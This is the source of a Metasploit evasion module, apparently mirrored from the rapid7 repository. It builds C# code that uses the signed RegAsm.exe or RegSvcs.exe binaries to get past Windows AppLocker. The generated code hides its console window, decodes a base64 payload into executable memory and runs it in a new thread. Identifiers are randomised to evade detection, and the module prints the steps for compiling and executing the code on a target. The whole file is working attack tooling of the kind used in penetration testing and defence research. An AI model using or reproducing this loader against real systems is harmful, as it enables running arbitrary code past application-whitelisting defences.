Book a Demo!
CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutPoliciesSign UpSign In
rapid7
GitHub Repository: rapid7/metasploit-framework
Path: blob/master/modules/evasion/windows/applocker_evasion_regasm_regsvcs.rb
19715 views
1
##
2
# This module requires Metasploit: https://metasploit.com/download
3
# Current source: https://github.com/rapid7/metasploit-framework
4
##
5
6
class MetasploitModule < Msf::Evasion
7
8
def initialize(info = {})
9
super(
10
update_info(
11
info,
12
'Name' => 'Applocker Evasion - Microsoft .NET Assembly Registration Utility',
13
'Description' => %q{
14
This module will assist you in evading Microsoft
15
Windows Applocker and Software Restriction Policies.
16
This technique utilises the Microsoft signed binaries
17
RegAsm.exe or RegSvcs.exe to execute user supplied code.
18
},
19
'Author' => [
20
'Nick Tyrer <@NickTyrer>', # module development
21
'Casey Smith' # regasm_regsvcs bypass research
22
],
23
'License' => MSF_LICENSE,
24
'Platform' => 'win',
25
'Arch' => [ARCH_X86, ARCH_X64],
26
'Targets' => [['Microsoft Windows', {}]],
27
'References' => [['URL', 'https://attack.mitre.org/techniques/T1121/']]
28
)
29
)
30
31
register_options(
32
[
33
OptString.new('TXT_FILE', [true, 'Filename for the evasive file (default: regasm_regsvcs.txt)', 'regasm_regsvcs.txt']),
34
OptString.new('SNK_FILE', [true, 'Filename for the .snk file (default: key.snk)', 'key.snk'])
35
]
36
)
37
38
deregister_options('FILENAME')
39
end
40
41
def build_payload
42
Rex::Text.encode_base64(payload.encoded)
43
end
44
45
def obfu
46
Rex::Text.rand_text_alpha 8
47
end
48
49
def regasm_regsvcs
50
esc = build_payload
51
mod = [obfu, obfu, obfu, obfu, obfu, obfu, obfu, obfu, obfu, obfu, obfu, obfu, obfu, obfu, obfu]
52
<<~HEREDOC
53
using System;
54
using System.EnterpriseServices;
55
using System.Runtime.InteropServices;
56
namespace #{mod[0]}
57
{
58
public class #{mod[1]} : ServicedComponent
59
{
60
[ComRegisterFunction]
61
public static void RegisterClass(string #{mod[2]})
62
{
63
#{mod[3]}.#{mod[14]}();
64
}
65
[ComUnregisterFunction]
66
public static void UnRegisterClass(string #{mod[2]})
67
{
68
#{mod[3]}.#{mod[14]}();
69
}
70
}
71
public class #{mod[3]}
72
{
73
private static Int32 #{mod[4]}=0x1000;
74
private static IntPtr #{mod[5]}=(IntPtr)0x40;
75
private static UInt32 #{mod[6]} = 0xFFFFFFFF;
76
[System.Runtime.InteropServices.DllImport("kernel32")]
77
private static extern IntPtr VirtualAlloc(IntPtr a, UIntPtr s, Int32 t, IntPtr p);
78
[System.Runtime.InteropServices.DllImport("kernel32")]
79
private static extern IntPtr CreateThread(IntPtr att, UIntPtr st, IntPtr sa, IntPtr p, Int32 c, ref IntPtr id);
80
[System.Runtime.InteropServices.DllImport("kernel32")]
81
private static extern UInt32 WaitForSingleObject(IntPtr h, UInt32 ms);
82
[System.Runtime.InteropServices.DllImport("user32.dll")]
83
static extern bool ShowWindow(IntPtr #{mod[7]}, int nCmdShow);
84
[System.Runtime.InteropServices.DllImport("Kernel32")]
85
private static extern IntPtr GetConsoleWindow();
86
const int #{mod[8]} = 0;
87
public static void #{mod[14]}()
88
{
89
IntPtr #{mod[7]};
90
#{mod[7]} = GetConsoleWindow();
91
ShowWindow(#{mod[7]}, #{mod[8]});
92
string #{mod[9]} = "#{esc}";
93
byte[] #{mod[10]} = Convert.FromBase64String(#{mod[9]});
94
byte[] #{mod[11]} = #{mod[10]};
95
IntPtr #{mod[12]} = VirtualAlloc(IntPtr.Zero, (UIntPtr)#{mod[11]}.Length, #{mod[4]}, #{mod[5]});
96
System.Runtime.InteropServices.Marshal.Copy(#{mod[11]}, 0, #{mod[12]}, #{mod[11]}.Length);
97
IntPtr #{mod[13]} = IntPtr.Zero;
98
WaitForSingleObject(CreateThread(#{mod[13]}, UIntPtr.Zero, #{mod[12]}, #{mod[13]}, 0, ref #{mod[13]}), #{mod[6]});
99
}
100
}
101
}
102
HEREDOC
103
end
104
105
def snk
106
debaser = 'BwIAAAAkAABSU0EyAAQAAAEAAQD9yIxqf9oJgwLw6nUHqVNq4LaP+/eaL4qTT9K9aV/z7ddCP8+Uf2/47KnHklpaw+eH03ZaA2yKYBA9s+Al0VoyajA76HQp
107
HDaCgiURBIT2GBLUGwdhoEMWX5J8eoCzkucJEjSsavQh+r9JeB6zcQvoZIx0PrpELgQc8is8j2jvsFuc5LQ8ZFoPk1273TTxKibw84HFESjxJrRtkSjwoEo4OUuZtL3C7fD
108
gnaSoeLnMwohmyTTjt15zgBZv7xD5u/CHD4/+tySJufY5j0FkBxhyqt2DWHcmH4MQCC6PgYfIuTXEAD35o0cg+6s6pJYKB+DUCrU5vSime3jyWno9vCe87UT+fQcDrKntHB
109
mjnj9WliAMZlU1IuCWieT7fzGZqqIsd4rrcgxetnWzaWRAkgHcTVkmVPIt0z9zHU71s7CER2viklJkiaZjRQan5ZA7bTqqsuG1xoIyXTWbKsaAMCKf5a4IJS2ImpqaYA9HR
110
BrIV7be2o0QJxSm1LPqBXJqkAhnCpcYyfve2dql7fF+fAIDGe3ZgCEbJsfYuAaAY0snGJQhUgLmwO8GDbsbMUTuBQspDv8QXsF53UNH5v5dnOKaTfo71LrI+I5zBUqEYP3B
111
DtK0qryu/J1eq80nPAmpNqRbFnYm1OdGKpgzHS+Ws7obPSt1HG3//BxC3a5znX0evfCfSaaWRswhjvblnh1070b3jkT6nJeksKuuVEHvudAQAtGn2vxNDs4CqrJODi5Z/BA
112
KgpIZqQeZmh3r4Zb5OI0='
113
Rex::Text.decode_base64(debaser)
114
end
115
116
def file_format_filename(name = '')
117
name.empty? ? @fname : @fname = name
118
end
119
120
def create_files
121
f1 = datastore['TXT_FILE'].empty? ? 'regasm_regsvcs.txt' : datastore['TXT_FILE']
122
f1 << '.txt' unless f1.downcase.end_with?('.txt')
123
f2 = datastore['SNK_FILE'].empty? ? 'key.snk' : datastore['SNK_FILE']
124
f2 << '.snk' unless f2.downcase.end_with?('.snk')
125
txt_file = regasm_regsvcs
126
snk_file = snk
127
file_format_filename(f1)
128
file_create(txt_file)
129
file_format_filename(f2)
130
file_create(snk_file)
131
end
132
133
def instructions
134
print_status "Copy #{datastore['TXT_FILE']} and #{datastore['SNK_FILE']} to the target"
135
if payload.arch.first == ARCH_X86
136
print_status "Compile using: C:\\Windows\\Microsoft.Net\\Framework\\[.NET Version]\\csc.exe /r:System.EnterpriseServices.dll /target:library /out:#{datastore['TXT_FILE'].gsub('.txt', '.dll')} /keyfile:#{datastore['SNK_FILE']} #{datastore['TXT_FILE']}"
137
print_status "Execute using: C:\\Windows\\Microsoft.NET\\Framework\\[.NET Version]\\regsvcs.exe #{datastore['TXT_FILE'].gsub('.txt', '.dll')}"
138
print_status 'or'
139
print_status "Execute using: C:\\Windows\\Microsoft.NET\\Framework\\[.NET Version]\\regasm.exe /U #{datastore['TXT_FILE'].gsub('.txt', '.dll')}"
140
else
141
print_status "Compile using: C:\\Windows\\Microsoft.Net\\Framework64\\[.NET Version]\\csc.exe /r:System.EnterpriseServices.dll /target:library /out:#{datastore['TXT_FILE'].gsub('.txt', '.dll')} /keyfile:#{datastore['SNK_FILE']} #{datastore['TXT_FILE']}"
142
print_status "Execute using: C:\\Windows\\Microsoft.NET\\Framework64\\[.NET Version]\\regsvcs.exe #{datastore['TXT_FILE'].gsub('.txt', '.dll')}"
143
print_status 'or'
144
print_status "Execute using: C:\\Windows\\Microsoft.NET\\Framework64\\[.NET Version]\\regasm.exe /U #{datastore['TXT_FILE'].gsub('.txt', '.dll')}"
145
end
146
end
147
148
def run
149
create_files
150
instructions
151
end
152
end
153
154